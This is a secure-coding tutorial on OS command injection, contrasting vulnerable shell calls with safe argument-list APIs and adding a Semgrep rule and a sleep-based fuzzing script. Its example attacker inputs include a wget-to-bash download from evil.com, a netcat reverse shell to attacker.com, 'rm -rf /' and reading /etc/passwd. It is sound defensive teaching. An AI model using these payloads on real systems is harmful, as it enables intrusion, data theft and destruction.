Command Injection: OS Command Sanitization

Key Insights

  • Command injection remains one of the most severe vulnerabilities because it grants attackers direct access to your operating system—avoid shell invocation entirely by using parameterized execution APIs
  • Blocklist-based sanitization always fails eventually; use strict allowlisting when you must accept user input that touches system commands
  • The difference between exec() and spawn() (or their equivalents) isn’t just stylistic—it’s the difference between a secure application and a compromised server

Introduction to Command Injection

Command injection occurs when an attacker can execute arbitrary operating system commands on your server through a vulnerable application. It’s not a subtle vulnerability—it’s a complete system compromise waiting to happen.

This attack class has earned its permanent spot in the OWASP Top 10 for good reason. The 2014 Shellshock vulnerability affected millions of servers worldwide, allowing attackers to execute commands through specially crafted environment variables in Bash. More recently, command injection flaws in widely used open-source packages and CI/CD tools have shown that even experienced developers get this wrong.

The stakes are straightforward: command injection means an attacker can read your database credentials, install backdoors, pivot to other systems, or simply run rm -rf / and watch your infrastructure disappear. There’s no partial compromise here.

How Command Injection Works

Command injection exploits the gap between “data” and “code” when your application constructs shell commands using untrusted input. When you concatenate user input into a string that gets passed to a shell interpreter, you’re trusting that input to be benign data. Attackers exploit this trust.

Shell interpreters recognize special characters that change command flow:

  • ; terminates a command and starts a new one
  • | pipes output to another command
  • && and || chain commands conditionally
  • $() and backticks execute subcommands
  • > and >> redirect output to files
  • Newlines can separate commands

Here’s a vulnerable Python example:

import os

def ping_host(hostname):
    # VULNERABLE: User input directly interpolated into shell command
    os.system(f"ping -c 4 {hostname}")

# Attacker input: "google.com; cat /etc/passwd"
# Executed command: ping -c 4 google.com; cat /etc/passwd

The Node.js equivalent is equally dangerous:

const { exec } = require('child_process');

function convertImage(filename) {
    // VULNERABLE: User-controlled filename in shell command
    exec(`convert ${filename} output.png`, (error, stdout, stderr) => {
        if (error) console.error(error);
    });
}

// Attacker input: "image.jpg; rm -rf /"
// Executed command: convert image.jpg; rm -rf / output.png

The shell doesn’t know that filename was supposed to be just a filename. It interprets the entire string, special characters and all.
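
The effect can be reproduced harmlessly. The sketch below assumes a POSIX shell and replaces the destructive payload with a second echo; run_in_shell is a hypothetical helper used only for this demonstration.

```python
import subprocess

def run_in_shell(user_input):
    # Deliberately vulnerable: the input is pasted into a shell command string.
    # Only call this with harmless demo payloads.
    completed = subprocess.run(
        f"echo {user_input}",
        shell=True,
        capture_output=True,
        text=True,
    )
    return completed.stdout.splitlines()

# The shell splits the string at ';' and runs two separate commands,
# so the output contains one line per command.
print(run_in_shell("hello; echo INJECTED"))
```

The second line of output comes from a command the caller never intended to run, which is exactly what happens with cat /etc/passwd or rm in the examples above.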

Common Vulnerable Patterns

Certain code patterns consistently produce command injection vulnerabilities. Learning to recognize them saves you from introducing these flaws.

Image processing pipelines frequently shell out to tools like ImageMagick:

import os

def resize_image(user_filename, width, height):
    # VULNERABLE: Multiple user inputs in command
    os.system(f"convert {user_filename} -resize {width}x{height} output.jpg")

# Attacker can inject via filename OR dimensions
# filename: "input.jpg -write /tmp/pwned.php input.jpg"
# This exploits ImageMagick's own argument parsing

Network diagnostic tools are common targets:

import subprocess

def check_host(ip_address):
    # VULNERABLE: Even subprocess with shell=True is dangerous
    result = subprocess.run(
        f"ping -c 1 {ip_address}",
        shell=True,
        capture_output=True
    )
    return result.stdout

# Attacker input: "127.0.0.1; wget -qO- http://evil.com/backdoor.sh | bash"
# (-qO- makes wget write the script to stdout so the pipe to bash receives it)

File operations with user-controlled paths often hide injection vectors:

const { exec } = require('child_process');

function compressUpload(uploadedFilename) {
    // VULNERABLE: Filename from user upload
    exec(`gzip -k uploads/${uploadedFilename}`, (err) => {
        if (err) console.error('Compression failed');
    });
}

// Attacker uploads file named: "file.txt; nc -e /bin/sh attacker.com 4444"

Environment variable injection is often overlooked:

#!/bin/bash
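# VULNERABLE: Environment variable expanded without quotes
LOG_DIR="${USER_LOG_PATH:-/var/log}"
tar -czf backup.tar.gz $LOG_DIR
# The unquoted expansion is word-split, so a value such as
# "/var/log --checkpoint=1 --checkpoint-action=exec=id" injects tar options
# that run a command. A ";" inside the value is not re-parsed as a separator;
# the danger here is injected arguments, and quoting "$LOG_DIR" after "--" closes it.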
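
To see why the missing quotes matter, the following sketch emulates how Bash turns the variable into arguments under the default IFS. It only builds the argument list and executes nothing. The helper name tar_argv and the hostile value are illustrative assumptions; the --checkpoint-action=exec option is a GNU tar feature that runs a command, and globbing (which Bash also applies to unquoted expansions) is left out for brevity.

```python
def tar_argv(log_dir, quoted):
    # Emulates $LOG_DIR (unquoted) versus "$LOG_DIR" (quoted) in Bash.
    base = ["tar", "-czf", "backup.tar.gz"]
    if quoted:
        # Quoted expansion: exactly one argument, with "--" ending options.
        return base + ["--", log_dir]
    # Unquoted expansion: split on whitespace into several arguments.
    return base + log_dir.split()

hostile = "/var/log --checkpoint=1 --checkpoint-action=exec=id"
print(tar_argv(hostile, quoted=False))  # tar would see two extra options
print(tar_argv(hostile, quoted=True))   # tar would see one odd-looking path
```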

Defense Strategy 1: Avoid the Shell Entirely

The most effective defense is never invoking a shell interpreter. Most languages provide APIs that execute programs directly, passing arguments as separate array elements rather than a parsed string.

Python’s subprocess with argument lists:

import subprocess

def ping_host_safe(hostname):
    # SAFE: Arguments passed as list, no shell interpretation
    result = subprocess.run(
        ["ping", "-c", "4", hostname],
        capture_output=True,
        text=True
    )
    return result.stdout

# Even if hostname is "google.com; rm -rf /", it's treated as a literal
# string argument to ping, which will simply fail to resolve

Node.js spawn vs exec:

const { spawn } = require('child_process');

function convertImageSafe(filename) {
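    // SAFE: spawn() doesn't invoke a shell unless the shell option is set
    // Named "child" to avoid shadowing Node's global process object
    const child = spawn('convert', [filename, 'output.png']);

    // Without an 'error' listener, a missing binary would crash the app
    child.on('error', (err) => console.error(err));
    child.on('close', (code) => {
        console.log(`Process exited with code ${code}`);
    });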
}

// The filename "image.jpg; rm -rf /" becomes a single argument
// convert receives it literally and fails gracefully

Go’s exec.Command:

package main

import (
    "os/exec"
)

func pingHost(hostname string) ([]byte, error) {
    // SAFE: Arguments are separate, no shell parsing
    cmd := exec.Command("ping", "-c", "4", hostname)
    return cmd.Output()
}

// Malicious input like "google.com; cat /etc/passwd" 
// is passed as a single argument to ping

Java’s ProcessBuilder:

import java.io.*;
import java.util.*;

public class SafeCommand {
    public static String pingHost(String hostname) throws IOException {
        // SAFE: Arguments in list form
        ProcessBuilder pb = new ProcessBuilder("ping", "-c", "4", hostname);
        Process process = pb.start();
        
        BufferedReader reader = new BufferedReader(
            new InputStreamReader(process.getInputStream())
        );
        StringBuilder output = new StringBuilder();
        String line;
        while ((line = reader.readLine()) != null) {
            output.append(line).append("\n");
        }
        return output.toString();
    }
}

The key principle: when arguments are array elements rather than parts of a parsed string, shell metacharacters lose their special meaning.
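
One way to check this principle is to ask a child process what it actually received. The sketch below starts a second Python interpreter without a shell and has it report its own arguments; child_argv is a hypothetical helper, and the child is Python rather than ping only so the result is easy to inspect.

```python
import json
import subprocess
import sys

def child_argv(*args):
    # Start a child Python process without a shell and have it print
    # the arguments it received as JSON.
    script = "import json, sys; print(json.dumps(sys.argv[1:]))"
    completed = subprocess.run(
        [sys.executable, "-c", script, *args],
        capture_output=True,
        text=True,
        check=True,
    )
    return json.loads(completed.stdout)

# The payload arrives as one untouched string; no second command is run.
print(child_argv("google.com; cat /etc/passwd"))
```

The semicolon, the space, and everything after them stay inside a single argument, which is why ping in the earlier examples merely fails to resolve the name.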

Defense Strategy 2: Input Validation and Sanitization

Sometimes you genuinely need shell features—pipes, redirects, or complex command chains. When shell invocation is unavoidable, implement strict input validation.

Allowlisting beats blocklisting every time:

import re
import subprocess

ALLOWED_HOSTS = {"google.com", "github.com", "internal.company.com"}

def ping_allowed_host(hostname):
    # Strict allowlist validation
    if hostname not in ALLOWED_HOSTS:
        raise ValueError(f"Host {hostname} not in allowed list")
    
    return subprocess.run(
        ["ping", "-c", "4", hostname],
        capture_output=True,
        text=True
    ).stdout

def ping_validated_ip(ip_address):
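    # Pattern validation for IP addresses. fullmatch() with [0-9] rejects the
    # trailing newline and non-ASCII digits that '$' and '\d' would let through.
    ip_pattern = re.compile(r'(?:[0-9]{1,3}\.){3}[0-9]{1,3}')
    if not ip_pattern.fullmatch(ip_address):
        raise ValueError("Invalid IP address format")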
    
    # Additional check: validate each octet
    octets = ip_address.split('.')
    if not all(0 <= int(octet) <= 255 for octet in octets):
        raise ValueError("IP address octets out of range")
    
    return subprocess.run(
        ["ping", "-c", "4", ip_address],
        capture_output=True,
        text=True
    ).stdout
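
As an alternative to a hand-written pattern, Python's standard ipaddress module can do the parsing. This is a minimal sketch; parse_ipv4 is a hypothetical helper name, and it accepts IPv4 only.

```python
import ipaddress

def parse_ipv4(text):
    # IPv4Address raises a ValueError subclass for anything that is not a
    # plain dotted-quad address, including trailing newlines or shell syntax.
    return str(ipaddress.IPv4Address(text))

print(parse_ipv4("192.168.1.10"))
```

The returned string can then be passed to subprocess.run() as a list element, exactly as in ping_validated_ip above.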

When you must use shell, escape properly:

import shlex
import subprocess

def search_logs_shell(search_term):
    # shlex.quote() escapes shell metacharacters
    safe_term = shlex.quote(search_term)
    
    # Still not ideal, but safer when shell=True is required.
    # "--" stops grep from treating a term such as "-f" as an option.
    result = subprocess.run(
        f"grep -- {safe_term} /var/log/app.log | head -100",
        shell=True,
        capture_output=True,
        text=True
    )
    return result.stdout
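
Often the shell is only there for a simple pipe, and the pipe can move into Python. The sketch below is one possible shell-free version of the same search, assuming grep is on the PATH; search_logs and its path and limit parameters are illustrative, not part of the original example.

```python
import subprocess

def search_logs(search_term, path="/var/log/app.log", limit=100):
    # No shell: grep receives the term as a single argument. "-e" marks it
    # as the pattern even if it starts with "-", and "--" ends option parsing.
    completed = subprocess.run(
        ["grep", "-e", search_term, "--", path],
        capture_output=True,
        text=True,
    )
    # grep exits with 1 when nothing matches; higher codes are real errors.
    if completed.returncode > 1:
        raise RuntimeError(completed.stderr.strip())
    # Equivalent of "| head -100", done in Python instead of the shell.
    return completed.stdout.splitlines()[:limit]
```

With this shape there is nothing to escape, so shlex.quote() is no longer needed for this particular command.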

Bash script sanitization:

#!/bin/bash

sanitize_filename() {
    local input="$1"
    # Remove any character that isn't alphanumeric, dash, underscore, or dot.
    # printf is used instead of echo so input like "-n" is not read as an option.
    printf '%s' "$input" | tr -cd 'a-zA-Z0-9._-'
}

process_file() {
    local raw_filename="$1"
    local safe_filename
    safe_filename=$(sanitize_filename "$raw_filename")
    
    # Verify the sanitized name isn't empty
    if [[ -z "$safe_filename" ]]; then
        echo "Invalid filename" >&2
        return 1
    fi
    
    # Use quotes and -- to prevent option injection
    cat -- "$safe_filename"
}
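
The same allowlist idea can be expressed in Python. The sketch below is a stricter variant that rejects a bad name instead of stripping characters from it, so two different inputs can never collapse into the same filename. The helper name, the 255-character limit, and the rule that names must start with a letter or digit are assumptions made for this example.

```python
import re

# First character: letter or digit, so the name cannot look like an option
# and cannot be "." or "..". Remaining characters: the same allowlist as above.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,254}")

def require_safe_filename(raw):
    # fullmatch() checks the whole string, including any trailing newline.
    if not SAFE_NAME.fullmatch(raw):
        raise ValueError("Invalid filename")
    return raw

print(require_safe_filename("report-2024.txt"))
```

Even with a validated name, keep passing it as a separate argument after "--", as the Bash version does.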

Testing and Detection

Identifying command injection requires multiple approaches: static analysis, code review, and active testing.

Semgrep rule for detecting vulnerable patterns:

rules:
  - id: python-command-injection
    patterns:
      - pattern-either:
          - pattern: os.system($CMD)
          - pattern: subprocess.run($CMD, shell=True, ...)
          - pattern: subprocess.call($CMD, shell=True, ...)
          - pattern: subprocess.Popen($CMD, shell=True, ...)
    message: "Potential command injection - avoid shell=True and os.system()"
    languages: [python]
    severity: ERROR

  - id: node-command-injection
    patterns:
      - pattern-either:
          - pattern: exec($CMD, ...)
          - pattern: execSync($CMD, ...)
    message: "Potential command injection - use spawn() instead of exec()"
    languages: [javascript, typescript]
    severity: ERROR
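
To make concrete what the Python rule looks for, here is a rough standard-library approximation built on the ast module. It is a sketch, not a replacement for Semgrep: it only recognizes the literal spelling os.system(...) and calls that pass shell=True, and it does not resolve import aliases. The function name find_shell_calls is hypothetical.

```python
import ast

def find_shell_calls(source):
    """Return sorted (line, reason) pairs for os.system(...) and shell=True calls."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        # Matches the literal spelling os.system(...); aliases are not resolved.
        if (isinstance(func, ast.Attribute) and func.attr == "system"
                and isinstance(func.value, ast.Name) and func.value.id == "os"):
            findings.append((node.lineno, "os.system"))
        # Matches any call that passes the keyword argument shell=True.
        for keyword in node.keywords:
            if (keyword.arg == "shell"
                    and isinstance(keyword.value, ast.Constant)
                    and keyword.value.value is True):
                findings.append((node.lineno, "shell=True"))
    return sorted(findings)

sample = (
    "import os, subprocess\n"
    "os.system('ls ' + name)\n"
    "subprocess.run(['ls', name])\n"
    "subprocess.run('ls ' + name, shell=True)\n"
)
print(find_shell_calls(sample))
```

The list-based subprocess.run() call on line 3 of the sample is not reported, which mirrors the intent of the rule: flag shell invocation, not process execution in general.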

Simple fuzzing script for testing endpoints:

#!/usr/bin/env python3
import requests
import time

INJECTION_PAYLOADS = [
    "; sleep 5",
    "| sleep 5",
    "&& sleep 5",
    "|| sleep 5",
    "`sleep 5`",
    "$(sleep 5)",
    "\n sleep 5",
    "'; sleep 5; '",
]

def test_endpoint(url, param_name):
    for payload in INJECTION_PAYLOADS:
        start = time.time()
        try:
            response = requests.get(
                url,
                params={param_name: f"test{payload}"},
                timeout=10
            )
            elapsed = time.time() - start
            
            if elapsed > 4:  # Sleep-based detection
                print(f"[VULNERABLE] Payload '{payload}' caused {elapsed:.1f}s delay")
        except requests.Timeout:
            print(f"[VULNERABLE] Payload '{payload}' caused timeout")

# Usage: test_endpoint("http://localhost:8080/ping", "host")
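
A fixed four-second cutoff can flag endpoints that are simply slow. One possible refinement, sketched below, compares each response against baseline timings collected from a few harmless requests first. The function name, the 0.8 tolerance, and the use of the median are assumptions for illustration.

```python
import statistics

def is_suspicious_delay(baseline_samples, elapsed, injected_sleep=5.0, tolerance=0.8):
    # Compare against the endpoint's normal latency rather than a fixed cutoff,
    # so a consistently slow endpoint is not reported as vulnerable.
    baseline = statistics.median(baseline_samples)
    return (elapsed - baseline) >= injected_sleep * tolerance

# Fast endpoint that suddenly takes about five seconds longer: suspicious.
print(is_suspicious_delay([0.10, 0.20, 0.15], 5.3))
# Endpoint that always takes about five seconds: not suspicious.
print(is_suspicious_delay([4.8, 5.1, 5.0], 5.2))
```

In test_endpoint, the baseline samples would come from timing a few requests with a benign parameter value before the payload loop starts. A timing hit remains a lead to verify by hand, not proof of a vulnerability.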

Summary and Security Checklist

Command injection is preventable. Follow these principles during development and code review:

Pre-deployment checklist:

  1. Audit all shell invocations — Search your codebase for os.system, exec(), shell=True, and similar patterns
  2. Replace shell calls with parameterized APIs — Use subprocess.run() with argument lists, spawn() instead of exec(), or equivalent safe APIs
  3. Validate inputs against strict allowlists — If you must accept user input for commands, define exactly what’s permitted
  4. Escape when unavoidable — Use shlex.quote() or equivalent when shell invocation is truly necessary
  5. Run static analysis — Integrate Semgrep, CodeQL, or Bandit into your CI pipeline
  6. Test with injection payloads — Include command injection tests in your security testing suite
  7. Apply least privilege — Run application processes with minimal OS permissions to limit blast radius

The safest shell command is the one you never execute. Design your systems to avoid shelling out whenever possible, and treat every case where you do as a potential vulnerability requiring careful review.
